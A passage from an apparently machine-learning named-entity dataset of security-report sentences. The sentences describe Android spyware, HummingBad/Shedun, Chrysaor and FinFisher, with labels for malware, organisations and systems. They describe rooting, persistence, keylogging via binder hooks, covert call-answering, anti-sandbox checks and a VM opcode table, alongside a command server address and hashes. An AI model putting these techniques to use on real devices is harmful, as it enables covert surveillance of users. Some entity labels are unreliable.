coordinates , so it calculates pressed characters by matching given values with hardcoded ones : Additionally , if there is a predefined command , the keylogger can make a screenshot of the tapped display area : Manual access and operator menu There is a hidden menu ( Activity ) for controlling implant features that", "spans": {}, "info": {"id": "cyner_train_000621", "source": "cyner_train"}} {"text": "looks like it was created for manual operator control .", "spans": {}, "info": {"id": "cyner_train_000622", "source": "cyner_train"}} {"text": "It also shows a current malware log .", "spans": {}, "info": {"id": "cyner_train_000624", "source": "cyner_train"}} {"text": "Infrastructure FTP server The attackers used ftp : //213.174.157 [ .", "spans": {}, "info": {"id": "cyner_train_000625", "source": "cyner_train"}} {"text": "] 151/ as a command and control server .", "spans": {}, "info": {"id": "cyner_train_000626", "source": "cyner_train"}} {"text": "The IP belongs to the free Russian web hosting service Ucoz .", "spans": {}, "info": {"id": "cyner_train_000627", "source": "cyner_train"}} {"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play.google.com/store/apps/details ?", "spans": {}, "info": {"id": "cyner_train_000628", "source": "cyner_train"}} {"text": "id=eu.chainfire.supersu ) tool 246.us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk", "spans": {"SYSTEM: Android": [[244, 251]], "ORGANIZATION: ASUS": [[384, 388]]}, "info": {"id": "cyner_train_000629", "source": "cyner_train"}} {"text": "Corrupted archive privapp.txt Looks like a 
list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently .", "spans": {}, "info": {"id": "cyner_train_000630", "source": "cyner_train"}} {"text": "Content of bdata.xml file : It can be added to the /system/etc/sysconfig/ path to allowlist specified implant components from the battery saving system .", "spans": {}, "info": {"id": "cyner_train_000631", "source": "cyner_train"}} {"text": "10 million Android phones infected by all-powerful auto-rooting apps First detected in November , Shedun/HummingBad infections are surging .", "spans": {"SYSTEM: Android": [[11, 18]], "MALWARE: Shedun/HummingBad": [[98, 115]]}, "info": {"id": "cyner_train_000633", "source": "cyner_train"}} {"text": "FURTHER READING New type of auto-rooting Android adware is nearly impossible to remove Researchers from security firm Check Point Software said the malware installs more than 50,000 fraudulent apps each day , displays 20 million malicious advertisements , and generates more than $ 300,000 per month in revenue .", "spans": {"SYSTEM: Android": [[41, 48]], "ORGANIZATION: Check Point Software": [[118, 138]]}, "info": {"id": "cyner_train_000635", "source": "cyner_train"}} {"text": "The Check Point researchers have dubbed the malware family \" HummingBad , '' but researchers from mobile security company Lookout say HummingBad is in fact Shedun , a family of auto-rooting malware that came to light last November and had already infected a large number of devices .", "spans": {"ORGANIZATION: Check Point": [[4, 15]], "MALWARE: HummingBad": [[61, 71], [134, 144]], "ORGANIZATION: Lookout": [[122, 129]], "MALWARE: Shedun": [[156, 162]]}, "info": {"id": "cyner_train_000637", "source": "cyner_train"}} {"text": "Update Jul 11 2016 8:32 : On Monday , a Checkpoint representative disputed Lookout 
's contention and pointed to this blog post from security firm Eleven Paths as support .", "spans": {"ORGANIZATION: Checkpoint": [[40, 50]], "ORGANIZATION: Lookout": [[75, 82]], "ORGANIZATION: Eleven Paths": [[146, 158]]}, "info": {"id": "cyner_train_000638", "source": "cyner_train"}} {"text": "In an e-mail , a Lookout representative stood by its analysis and said company researchers planned to publish an in-depth response in the coming days .", "spans": {"ORGANIZATION: Lookout": [[17, 24]]}, "info": {"id": "cyner_train_000640", "source": "cyner_train"}} {"text": "For the past five months , Check Point researchers have quietly observed the China-based advertising company behind HummingBad in several ways , including by infiltrating the command and control servers it uses .", "spans": {"ORGANIZATION: Check Point": [[27, 38]], "MALWARE: HummingBad": [[116, 126]]}, "info": {"id": "cyner_train_000641", "source": "cyner_train"}} {"text": "HummingBad does this by silently installing promoted apps on infected phones , defrauding legitimate mobile advertisers , and creating fraudulent statistics inside the official Google Play Store .", "spans": {"MALWARE: HummingBad": [[0, 10]], "SYSTEM: Google Play Store": [[177, 194]]}, "info": {"id": "cyner_train_000643", "source": "cyner_train"}} {"text": "\" Accessing these devices and their sensitive data creates a new and steady stream of revenue for cybercriminals , '' Check Point researchers wrote in a recently published report .", "spans": {}, "info": {"id": "cyner_train_000644", "source": "cyner_train"}} {"text": "\" Emboldened by financial and technological independence , their skillsets will advance–putting end users , enterprises , and government agencies at risk .", "spans": {}, "info": {"id": "cyner_train_000645", "source": "cyner_train"}} {"text": "'' The report said HummingBad apps are developed by Yingmob , a Chinese mobile ad server company that other researchers claim is behind the Yinspector iOS malware .", "spans": 
{"MALWARE: HummingBad": [[19, 29]], "ORGANIZATION: Yingmob": [[52, 59]], "MALWARE: Yinspector": [[140, 150]], "SYSTEM: iOS": [[151, 154]]}, "info": {"id": "cyner_train_000646", "source": "cyner_train"}} {"text": "HummingBad sends notifications to Umeng , a tracking and analytics service attackers use to manage their campaign .", "spans": {"MALWARE: HummingBad": [[0, 10]]}, "info": {"id": "cyner_train_000647", "source": "cyner_train"}} {"text": "The researchers wrote : While profit is powerful motivation for any attacker , Yingmob ’ s apparent self-sufficiency and organizational structure make it well-positioned to expand into new business ventures , including productizing the access to the 85 million Android devices it controls .", "spans": {"ORGANIZATION: Yingmob": [[79, 86]], "SYSTEM: Android": [[261, 268]]}, "info": {"id": "cyner_train_000649", "source": "cyner_train"}} {"text": "This alone would attract a whole new audience–and a new stream of revenue–for Yingmob .", "spans": {"ORGANIZATION: Yingmob": [[78, 85]]}, "info": {"id": "cyner_train_000650", "source": "cyner_train"}} {"text": "One involves drive-by downloads , possibly on booby-trapped porn sites .", "spans": {}, "info": {"id": "cyner_train_000653", "source": "cyner_train"}} {"text": "In some cases , malicious components are dynamically downloaded onto a device after an infected app is installed .", "spans": {}, "info": {"id": "cyner_train_000657", "source": "cyner_train"}} {"text": "From there , infected phones display illegitimate ads and install fraudulent apps after certain events , such as rebooting , the screen turning on or off , a detection that the user is present , or a change in Internet connectivity .", "spans": {}, "info": {"id": "cyner_train_000658", "source": "cyner_train"}} {"text": "HummingBad also has the ability to inject code into Google Play to tamper with its ratings and statistics .", "spans": {"MALWARE: HummingBad": [[0, 10]], "SYSTEM: Google Play": [[52, 63]]}, "info": {"id": 
"cyner_train_000659", "source": "cyner_train"}} {"text": "It does this by using infected devices to imitate clicks on the install , buy , and accept buttons .", "spans": {}, "info": {"id": "cyner_train_000660", "source": "cyner_train"}} {"text": "Many of the 10 million infected phones are running old versions of Android and reside in China ( 1.6 million ) and India ( 1.35 million ) .", "spans": {"SYSTEM: Android": [[67, 74]]}, "info": {"id": "cyner_train_000661", "source": "cyner_train"}} {"text": "Still , US-based infected phones total almost 287,000 .", "spans": {}, "info": {"id": "cyner_train_000662", "source": "cyner_train"}} {"text": "The most widely infected major Android versions are KitKat with 50 percent , followed by Jelly Bean with 40 percent .", "spans": {"SYSTEM: Android": [[31, 38]], "SYSTEM: KitKat": [[52, 58]], "SYSTEM: Jelly Bean": [[89, 99]]}, "info": {"id": "cyner_train_000663", "source": "cyner_train"}} {"text": "It 's often hard for average users to know if their phones have been rooted , and Shedun apps often wait some period of time before displaying obtrusive ads or installing apps .", "spans": {"MALWARE: Shedun": [[82, 88]]}, "info": {"id": "cyner_train_000665", "source": "cyner_train"}} {"text": "The best bet for Readers who want to make sure their phone is n't infected is to scan their phones using the free version of the Lookout Security and Antivirus app .", "spans": {"ORGANIZATION: Lookout": [[129, 136]]}, "info": {"id": "cyner_train_000666", "source": "cyner_train"}} {"text": "Android malware has drastically lower rates of success when app installations outside of Google Play are barred .", "spans": {"SYSTEM: Android": [[0, 7]], "SYSTEM: Google Play": [[89, 100]]}, "info": {"id": "cyner_train_000667", "source": "cyner_train"}} {"text": "Top 20 countries targeted by Hummingbad/Shedun .", "spans": {"MALWARE: Hummingbad/Shedun": [[29, 46]]}, "info": {"id": "cyner_train_000669", "source": "cyner_train"}} {"text": "Enlarge / Top 20 
countries targeted by Hummingbad/Shedun .", "spans": {"MALWARE: Hummingbad/Shedun": [[39, 56]]}, "info": {"id": "cyner_train_000670", "source": "cyner_train"}} {"text": "Check Point Software Hummingbad/Shedun infections by Android version .", "spans": {"ORGANIZATION: Check Point Software": [[0, 20]], "MALWARE: Hummingbad/Shedun": [[21, 38]], "SYSTEM: Android": [[53, 60]]}, "info": {"id": "cyner_train_000671", "source": "cyner_train"}} {"text": "Enlarge / Hummingbad/Shedun infections by Android version .", "spans": {"MALWARE: Hummingbad/Shedun": [[10, 27]], "SYSTEM: Android": [[42, 49]]}, "info": {"id": "cyner_train_000672", "source": "cyner_train"}} {"text": "Check Point Software So far , HummingBad has been observed using its highly privileged status only to engage in click fraud , display pop-up ads , tamper with Google Play , and install additional apps that do more of the same .", "spans": {"ORGANIZATION: Check Point Software": [[0, 20]], "MALWARE: HummingBad": [[30, 40]], "SYSTEM: Google Play": [[159, 170]]}, "info": {"id": "cyner_train_000673", "source": "cyner_train"}} {"text": "But there 's little stopping it from doing much worse .", "spans": {}, "info": {"id": "cyner_train_000674", "source": "cyner_train"}} {"text": "That 's because the malware roots most of the phones it infects , a process that subverts key security mechanisms built into Android .", "spans": {"SYSTEM: Android": [[125, 132]]}, "info": {"id": "cyner_train_000675", "source": "cyner_train"}} {"text": "Under a model known as sandboxing , most Android apps are n't permitted to access passwords or other data available to most other apps .", "spans": {"SYSTEM: Android": [[41, 48]]}, "info": {"id": "cyner_train_000676", "source": "cyner_train"}} {"text": "System applications with root , by contrast , have super-user permissions that allow them to break out of such sandboxes .", "spans": {}, "info": {"id": "cyner_train_000677", "source": "cyner_train"}} {"text": "Lookout said in its own blog post 
published Wednesday that its threat detection network has recently observed a surge of Shedun attacks , indicating the scourge wo n't be going away any time soon .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: Shedun": [[121, 127]]}, "info": {"id": "cyner_train_000680", "source": "cyner_train"}} {"text": "An investigation of Chrysaor Malware on Android 03 April 2017 Google is constantly working to improve our systems that protect users from Potentially Harmful Applications ( PHAs ) .", "spans": {"MALWARE: Chrysaor": [[20, 28]], "SYSTEM: Android": [[40, 47]], "ORGANIZATION: Google": [[62, 68]]}, "info": {"id": "cyner_train_000681", "source": "cyner_train"}} {"text": "However , a few PHA authors spend substantial effort , time , and money to create and install their harmful app on one or a very small number of devices .", "spans": {}, "info": {"id": "cyner_train_000683", "source": "cyner_train"}} {"text": "In this blog post , we describe Chrysaor , a newly discovered family of spyware that was used in a targeted attack on a small number of Android devices , and how investigations like this help Google protect Android users from a variety of threats .", "spans": {"MALWARE: Chrysaor": [[32, 40]], "SYSTEM: Android": [[136, 143], [207, 214]], "ORGANIZATION: Google": [[192, 198]]}, "info": {"id": "cyner_train_000685", "source": "cyner_train"}} {"text": "Chrysaor is spyware believed to be created by NSO Group Technologies , specializing in the creation and sale of software and infrastructure for targeted attacks .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "ORGANIZATION: NSO Group Technologies": [[46, 68]]}, "info": {"id": "cyner_train_000687", "source": "cyner_train"}} {"text": "Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "MALWARE: Pegasus": [[42, 49]], "SYSTEM: iOS": [[87, 90]], "ORGANIZATION: Citizen Lab": [[107, 118]], 
"ORGANIZATION: Lookout": [[123, 130]]}, "info": {"id": "cyner_train_000688", "source": "cyner_train"}} {"text": "Late last year , after receiving a list of suspicious package names from Lookout , we discovered that a few dozen Android devices may have installed an application related to Pegasus , which we named Chrysaor .", "spans": {"ORGANIZATION: Lookout": [[73, 80]], "SYSTEM: Android": [[114, 121]], "MALWARE: Pegasus": [[175, 182]], "MALWARE: Chrysaor": [[200, 208]]}, "info": {"id": "cyner_train_000689", "source": "cyner_train"}} {"text": "Although the applications were never available in Google Play , we immediately identified the scope of the problem by using Verify Apps .", "spans": {"SYSTEM: Google Play": [[50, 61]], "SYSTEM: Verify Apps": [[124, 135]]}, "info": {"id": "cyner_train_000690", "source": "cyner_train"}} {"text": "We gathered information from affected devices , and concurrently , attempted to acquire Chrysaor apps to better understand its impact on users .", "spans": {"MALWARE: Chrysaor": [[88, 96]]}, "info": {"id": "cyner_train_000691", "source": "cyner_train"}} {"text": "We 've contacted the potentially affected users , disabled the applications on affected devices , and implemented changes in Verify Apps to protect all users .", "spans": {"SYSTEM: Verify Apps": [[125, 136]]}, "info": {"id": "cyner_train_000692", "source": "cyner_train"}} {"text": "What is the scope of Chrysaor ?", "spans": {"MALWARE: Chrysaor": [[21, 29]]}, "info": {"id": "cyner_train_000693", "source": "cyner_train"}} {"text": "Chrysaor was never available in Google Play and had a very low volume of installs outside of Google Play .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "SYSTEM: Google Play": [[32, 43], [93, 104]]}, "info": {"id": "cyner_train_000694", "source": "cyner_train"}} {"text": "Among the over 1.4 billion devices protected by Verify Apps , we observed fewer than 3 dozen installs of Chrysaor on victim devices .", "spans": {"SYSTEM: Verify Apps": [[48, 59]], 
"MALWARE: Chrysaor": [[105, 113]]}, "info": {"id": "cyner_train_000695", "source": "cyner_train"}} {"text": "These devices were located in the following countries : How we protect you To protect Android devices and users , Google Play provides a complete set of security services that update outside of platform releases .", "spans": {"SYSTEM: Android": [[86, 93]], "SYSTEM: Google Play": [[114, 125]]}, "info": {"id": "cyner_train_000696", "source": "cyner_train"}} {"text": "Users do n't have to install any additional security services to keep their devices safe .", "spans": {}, "info": {"id": "cyner_train_000697", "source": "cyner_train"}} {"text": "In 2016 , these services protected over 1.4 billion devices , making Google one of the largest providers of on-device security services in the world : Identify PHAs using people , systems in the cloud , and data sent to us from devices Warn users about or blocking users from installing PHAs Continually scan devices for PHAs and other harmful threats Additionally , we are providing detailed technical information to help the security industry in our collective work against PHAs .", "spans": {"ORGANIZATION: Google": [[69, 75]]}, "info": {"id": "cyner_train_000698", "source": "cyner_train"}} {"text": "What do I need to do ?", "spans": {}, "info": {"id": "cyner_train_000699", "source": "cyner_train"}} {"text": "It is extremely unlikely you or someone you know was affected by Chrysaor malware .", "spans": {"MALWARE: Chrysaor": [[65, 73]]}, "info": {"id": "cyner_train_000700", "source": "cyner_train"}} {"text": "Through our investigation , we identified less than 3 dozen devices affected by Chrysaor , we have disabled Chrysaor on those devices , and we have notified users of all known affected devices .", "spans": {"MALWARE: Chrysaor": [[80, 88], [108, 116]]}, "info": {"id": "cyner_train_000701", "source": "cyner_train"}} {"text": "To ensure you are fully protected against PHAs and other threats , we recommend these 5 basic 
steps : Install apps only from reputable sources : Install apps from a reputable source , such as Google Play .", "spans": {"SYSTEM: Google Play": [[192, 203]]}, "info": {"id": "cyner_train_000703", "source": "cyner_train"}} {"text": "No Chrysaor apps were on Google Play .", "spans": {"MALWARE: Chrysaor": [[3, 11]], "SYSTEM: Google Play": [[25, 36]]}, "info": {"id": "cyner_train_000704", "source": "cyner_train"}} {"text": "Enable a secure lock screen : Pick a PIN , pattern , or password that is easy for you to remember and hard for others to guess .", "spans": {}, "info": {"id": "cyner_train_000705", "source": "cyner_train"}} {"text": "Update your device : Keep your device up-to-date with the latest security patches .", "spans": {}, "info": {"id": "cyner_train_000706", "source": "cyner_train"}} {"text": "Locate your device : Practice finding your device with Android Device Manager because you are far more likely to lose your device than install a PHA .", "spans": {"SYSTEM: Android Device Manager": [[55, 77]]}, "info": {"id": "cyner_train_000708", "source": "cyner_train"}} {"text": "How does Chrysaor work ?", "spans": {"MALWARE: Chrysaor": [[9, 17]]}, "info": {"id": "cyner_train_000709", "source": "cyner_train"}} {"text": "To install Chrysaor , we believe an attacker coaxed specifically targeted individuals to download the malicious software onto their device .", "spans": {"MALWARE: Chrysaor": [[11, 19]]}, "info": {"id": "cyner_train_000710", "source": "cyner_train"}} {"text": "One representative sample Chrysaor app that we analyzed was tailored to devices running Jellybean ( 4.3 ) or earlier .", "spans": {"MALWARE: Chrysaor": [[26, 34]], "SYSTEM: Jellybean ( 4.3 )": [[88, 105]]}, "info": {"id": "cyner_train_000712", "source": "cyner_train"}} {"text": "The following is a review of scope and impact of the Chrysaor app named com.network.android tailored for a Samsung device target , with SHA256 digest : 
ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5Upon installation , the app uses known framaroot exploits to escalate privileges and break Android 's application sandbox .", "spans": {"MALWARE: Chrysaor": [[53, 61]], "ORGANIZATION: Samsung": [[107, 114]], "SYSTEM: Android": [[307, 314]]}, "info": {"id": "cyner_train_000713", "source": "cyner_train"}} {"text": "If the targeted device is not vulnerable to these exploits , then the app attempts to use a superuser binary pre-positioned at /system/csk to elevate privileges .", "spans": {}, "info": {"id": "cyner_train_000714", "source": "cyner_train"}} {"text": "After escalating privileges , the app immediately protects itself and starts to collect data , by : Installing itself on the /system partition to persist across factory resets Removing Samsung 's system update app ( com.sec.android.fotaclient ) and disabling auto-updates to maintain persistence ( sets Settings.System.SOFTWARE_UPDATE_AUTO_UPDATE to 0 ) Deleting WAP push messages and changing WAP message settings , possibly for anti-forensic purpose .", "spans": {"ORGANIZATION: Samsung": [[185, 192]]}, "info": {"id": "cyner_train_000715", "source": "cyner_train"}} {"text": "Starting content observers and the main task loop to receive remote commands and exfiltrate data The app uses six techniques to collect user data : Repeated commands : use alarms to periodically repeat actions on the device to expose data , including gathering location data .", "spans": {}, "info": {"id": "cyner_train_000716", "source": "cyner_train"}} {"text": "Content observers : use Android 's ContentObserver framework to gather changes in SMS , Calendar , Contacts , Cell info , Email , WhatsApp , Facebook , Twitter , Kakao , Viber , and Skype .", "spans": {"SYSTEM: Android": [[24, 31]], "SYSTEM: SMS": [[82, 85]], "SYSTEM: Calendar": [[88, 96]], "SYSTEM: Contacts": [[99, 107]], "SYSTEM: Cell info": [[110, 119]], "SYSTEM: Email": [[122, 127]], "SYSTEM: WhatsApp": [[130, 138]], 
"SYSTEM: Facebook": [[141, 149]], "SYSTEM: Twitter": [[152, 159]], "SYSTEM: Kakao": [[162, 167]], "SYSTEM: Viber": [[170, 175]], "SYSTEM: Skype": [[182, 187]]}, "info": {"id": "cyner_train_000719", "source": "cyner_train"}} {"text": "Screenshots : captures an image of the current screen via the raw frame buffer .", "spans": {}, "info": {"id": "cyner_train_000720", "source": "cyner_train"}} {"text": "Keylogging : record input events by hooking IPCThreadState : :Transact from /system/lib/libbinder.so , and intercepting android : :parcel with the interface com.android.internal.view.IInputContext .", "spans": {}, "info": {"id": "cyner_train_000721", "source": "cyner_train"}} {"text": "RoomTap : silently answers a telephone call and stays connected in the background , allowing the caller to hear conversations within the range of the phone 's microphone .", "spans": {}, "info": {"id": "cyner_train_000722", "source": "cyner_train"}} {"text": "If the user unlocks their device , they will see a black screen while the app drops the call , resets call settings and prepares for the user to interact with the device normally .", "spans": {}, "info": {"id": "cyner_train_000723", "source": "cyner_train"}} {"text": "Finally , the app can remove itself through three ways : Via a command from the server Autoremove if the device has not been able to check in to the server after 60 days Via an antidote file .", "spans": {}, "info": {"id": "cyner_train_000724", "source": "cyner_train"}} {"text": "If /sdcard/MemosForNotes was present on the device , the Chrysaor app removes itself from the device .", "spans": {"MALWARE: Chrysaor": [[57, 65]]}, "info": {"id": "cyner_train_000725", "source": "cyner_train"}} {"text": "Samples uploaded to VirusTotal To encourage further research in the security community , we ’ ve uploaded these sample Chrysaor apps to Virus Total .", "spans": {"ORGANIZATION: VirusTotal": [[20, 30]], "MALWARE: Chrysaor": [[119, 127]], "ORGANIZATION: Virus Total": [[136, 
147]]}, "info": {"id": "cyner_train_000726", "source": "cyner_train"}} {"text": "Additional digests with links to Chrysaor As a result of our investigation we have identified these additional Chrysaor-related apps .", "spans": {"MALWARE: Chrysaor": [[33, 41]], "MALWARE: Chrysaor-related": [[111, 127]]}, "info": {"id": "cyner_train_000728", "source": "cyner_train"}} {"text": "31a8633c2cd67ae965524d0b2192e9f14d04d016 FinFisher exposed : A researcher ’ s tale of defeating traps , tricks , and complex virtual machines March 1 , 2018 Office 365 Advanced Threat Protection ( Office 365 ATP )
blocked many notable zero-day exploits in 2017 .", "spans": {"MALWARE: FinFisher": [[41, 50]], "SYSTEM: Office 365 Advanced Threat Protection": [[157, 194]], "SYSTEM: Office 365 ATP": [[197, 211]]}, "info": {"id": "cyner_train_000732", "source": "cyner_train"}} {"text": "This threat actor is remarkable for two reasons : Its access to sophisticated zero-day exploits for Microsoft and Adobe software Its use of an advanced piece of government-grade surveillance spyware FinFisher , also known as FinSpy and detected by Microsoft security products as Wingbird FinFisher is such a complex piece of malware that , like other researchers , we had to devise special methods to crack it .", "spans": {"ORGANIZATION: Microsoft": [[100, 109], [248, 257]], "ORGANIZATION: Adobe": [[114, 119]], "MALWARE: FinFisher": [[199, 208], [288, 297]], "MALWARE: FinSpy": [[225, 231]], "MALWARE: Wingbird": [[279, 287]]}, "info": {"id": "cyner_train_000734", "source": "cyner_train"}} {"text": "This task proved to be nontrivial .", "spans": {}, "info": {"id": "cyner_train_000736", "source": "cyner_train"}} {"text": "FinFisher is not afraid of using all kinds of tricks , ranging from junk instructions and “ spaghetti code ” to multiple layers of virtual machines and several known and lesser-known anti-debug and defensive measures .", "spans": {"MALWARE: FinFisher": [[0, 9]]}, "info": {"id": "cyner_train_000737", "source": "cyner_train"}} {"text": "Security analysts are typically equipped with the tools to defeat a good number of similar tricks during malware investigations .", "spans": {}, "info": {"id": "cyner_train_000738", "source": "cyner_train"}} {"text": "The intricate anti-analysis methods reveal how much effort the FinFisher authors exerted to keep the malware hidden and difficult to analyze .", "spans": {"MALWARE: FinFisher": [[63, 72]]}, "info": {"id": "cyner_train_000741", "source": "cyner_train"}} {"text": "This exercise revealed tons of information about techniques used by FinFisher 
that we used to make Office 365 ATP more resistant to sandbox detection and Windows Defender ATP to catch similar techniques and generic behaviors .", "spans": {"MALWARE: FinFisher": [[68, 77]], "SYSTEM: Office 365 ATP": [[99, 113]], "SYSTEM: Windows Defender ATP": [[154, 174]]}, "info": {"id": "cyner_train_000742", "source": "cyner_train"}} {"text": "Generic Windows Defender ATP detections trigger alerts on FinFisher behavior While our analysis has allowed us to immediately protect our customers , we ’ d like to share our insights and add to the growing number of published analyses by other talented researchers ( listed below this blog post ) .", "spans": {"SYSTEM: Windows Defender ATP": [[8, 28]], "MALWARE: FinFisher": [[58, 67]]}, "info": {"id": "cyner_train_000746", "source": "cyner_train"}} {"text": "Spaghetti and junk codes make common analyst tools ineffective In analyzing FinFisher , the first obfuscation problem that requires a solution is the removal of junk instructions and “ spaghetti code ” , which is a technique that aims to confuse disassembly programs .", "spans": {"MALWARE: FinFisher": [[76, 85]]}, "info": {"id": "cyner_train_000748", "source": "cyner_train"}} {"text": "Armed with this code , we removed this first layer of anti-analysis protection .", "spans": {}, "info": {"id": "cyner_train_000755", "source": "cyner_train"}} {"text": "Removing the junk instructions revealed a readable block of code .", "spans": {}, "info": {"id": "cyner_train_000756", "source": "cyner_train"}} {"text": "The big first buffer is used as index for multiple concurrent threads .", "spans": {}, "info": {"id": "cyner_train_000758", "source": "cyner_train"}} {"text": "A big chunk of data is extracted from the portable executable ( PE ) file itself and decrypted two times using a custom XOR algorithm .", "spans": {}, "info": {"id": "cyner_train_000759", "source": "cyner_train"}} {"text": "We determined that this chunk of data contains an array of opcode instructions ready 
to be interpreted by a custom virtual machine program ( from this point on referenced generically as “ VM ” ) implemented by FinFisher authors .", "spans": {"MALWARE: FinFisher": [[210, 219]]}, "info": {"id": "cyner_train_000760", "source": "cyner_train"}} {"text": "The stages of the FinFisher multi-layered protection mechanisms Stage 0 : Dropper with custom virtual machine The main dropper implements the VM dispatcher loop and can use 32 different opcodes handlers .", "spans": {"MALWARE: FinFisher": [[18, 27]]}, "info": {"id": "cyner_train_000762", "source": "cyner_train"}} {"text": "The VM dispatcher loop routine ends with a JMP to another routine .", "spans": {}, "info": {"id": "cyner_train_000764", "source": "cyner_train"}} {"text": "In total , there are 32 different routines , each of them implementing a different opcode and some basic functionality that the malware program may execute .", "spans": {}, "info": {"id": "cyner_train_000765", "source": "cyner_train"}} {"text": "A snapshot of the code that processes each VM opcode and the associate interpreter The presence of a VM and virtualized instruction blocks can be described in simpler terms : Essentially , the creators of FinFisher interposed a layer of dynamic code translation ( the virtual machine ) that makes analysis using regular tools practically impossible .", "spans": {"MALWARE: snapshot": [[2, 10]], "MALWARE: FinFisher": [[205, 214]]}, "info": {"id": "cyner_train_000767", "source": "cyner_train"}} {"text": "Static analysis tools like IDA may not be useful in analyzing custom code that is interpreted and executed through a VM and a new set of instructions .", "spans": {}, "info": {"id": "cyner_train_000768", "source": "cyner_train"}} {"text": "At this stage , the analysis can only continue by manually investigating the individual code blocks and opcode handlers , which are highly obfuscated ( also using spaghetti code ) .", "spans": {}, "info": {"id": "cyner_train_000770", "source": "cyner_train"}} 
{"text": "Reusing our deobfuscation tool and some other tricks , we have been able to reverse and analyze these opcodes and map them to a finite list that can be used later to automate the analysis process with some scripting .", "spans": {}, "info": {"id": "cyner_train_000771", "source": "cyner_train"}} {"text": "The opcode instructions generated by this custom VM are divided into different categories : Logical opcodes , which implement bit-logic operators ( OR , AND , NOT , XOR ) and mathematical operators Conditional branching opcodes , which implement a code branch based on conditions ( equals to JC , JE , JZ , other similar branching opcodes ) Load/Store opcodes , which write to or read from particular addresses of the virtual address space of the process Specialized opcodes for various purposes ,", "spans": {}, "info": {"id": "cyner_train_000772", "source": "cyner_train"}} {"text": "like execute specialized machine instruction that are not virtualized We are publishing below the ( hopefully ) complete list of opcodes used by FinFisher VM that we found during our analysis and integrated into our de-virtualization script : INDEX MNEMONIC DESCRIPTION 0x0 EXEC Execute machine code 0x1 JG Jump if greater/Jump if not less or equal 0x2 WRITE Write a value into the dereferenced internal VM value ( treated as a pointer ) 0x3 JNO Jump if not overflow 0x4 JLE Jump", "spans": {"MALWARE: FinFisher": [[145, 154]]}, "info": {"id": "cyner_train_000773", "source": "cyner_train"}} {"text": "if less or equal ( signed ) 0x5 MOV Move the value of a register into the VM descriptor ( same as opcode 0x1F ) 0x6 JO Jump if overflow 0x7 PUSH Push the internal VM value to the stack 0x8 ZERO Reset the internal VM value to 0 ( zero ) 0x9 JP Jump if parity even 0xA WRITE Write into an address 0xB ADD Add the value of a register to the internal VM value 0xC JNS Jump if not signed 0xD JL Jump if less ( signed ) 0xE", "spans": {}, "info": {"id": "cyner_train_000774", "source": "cyner_train"}} 
{"text": "EXEC Execute machine code and branch 0xF JBE Jump if below or equal or Jump if not above 0x10 SHL Shift left the internal value the number of times specified into the opcodes 0x11 JA Jump if above/Jump if not below or equal 0x12 MOV Move the internal VM value into a register 0x13 JZ JMP if zero 0x14 ADD Add an immediate value to the internal Vm descriptor 0x15 JB Jump if below ( unsigned ) 0x16 JS Jump if signed 0x17 EXEC Execute", "spans": {}, "info": {"id": "cyner_train_000775", "source": "cyner_train"}} {"text": "machine code ( same as opcode 0x0 ) 0x18 JGE Jump if greater or equal/Jump if not less 0x19 DEREF Write a register value into a dereferenced pointer 0x1A JMP Special obfuscated “ Jump if below ” opcode 0x1B * Resolve a pointer 0x1C LOAD Load a value into the internal VM descriptor 0x1D JNE Jump if not equal/Jump if not zero 0x1E CALL Call an external function or a function located in the dropper 0x1F MOV", "spans": {}, "info": {"id": "cyner_train_000776", "source": "cyner_train"}} {"text": "Move the value of a register into the VM descriptor 0x20 JNB Jump if not below/Jump if above or equal/Jump if not carry 0x21 JNP Jump if not parity/Jump if parity odd Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM .", "spans": {}, "info": {"id": "cyner_train_000777", "source": "cyner_train"}} {"text": "This data structure is 24 bytes and is composed of some fixed fields and a variable portion that depends on the opcode .", "spans": {}, "info": {"id": "cyner_train_000778", "source": "cyner_train"}} {"text": "A graphical representation of the data structure used to store each VM opcode The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization ( ASLR ) .", "spans": {}, "info": {"id": "cyner_train_000781", "source": "cyner_train"}} {"text": "For instance , in the case of the “ 
Execute ” opcode ( 0x17 ) , the 32-bit code to run is stored entirely into the variable section with the value at offset 5 specifying the number of bytes to be copied and executed .", "spans": {}, "info": {"id": "cyner_train_000783", "source": "cyner_train"}} {"text": "Of course , not all the opcodes are can be easily read and understood due to additional steps that the authors have taken to make analysis extremely complicated .", "spans": {}, "info": {"id": "cyner_train_000785", "source": "cyner_train"}} {"text": "One of the obfuscation tricks included by the malware authors in a VM opcode dispatcher Even armed with the knowledge we have described so far , it still took us many hours to write a full-fledged opcode interpreter that ’ s able to reconstruct the real code executed by FinFisher .", "spans": {"MALWARE: FinFisher": [[271, 280]]}, "info": {"id": "cyner_train_000788", "source": "cyner_train"}} {"text": "The loader first dynamically rebuilds a simple import address table ( IAT ) , resolving all the API needed from Kernel32 and NtDll libraries .", "spans": {}, "info": {"id": "cyner_train_000790", "source": "cyner_train"}} {"text": "It eventually kills all threads that belong to these undesired modules ( using ZwQueryInformationThread native API with ThreadQuerySetWin32StartAddress information class ) .", "spans": {}, "info": {"id": "cyner_train_000792", "source": "cyner_train"}} {"text": "The first anti-sandbox technique is the loader checking the code segment .", "spans": {}, "info": {"id": "cyner_train_000793", "source": "cyner_train"}} {"text": "Next , the dropper checks its own parent process for indications that it is running in a sandbox setup .", "spans": {}, "info": {"id": "cyner_train_000795", "source": "cyner_train"}} {"text": "It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions are met : The MD5 hash of the parent process image name is either D0C4DBFA1F3962AED583F6FCE666F8BC or 
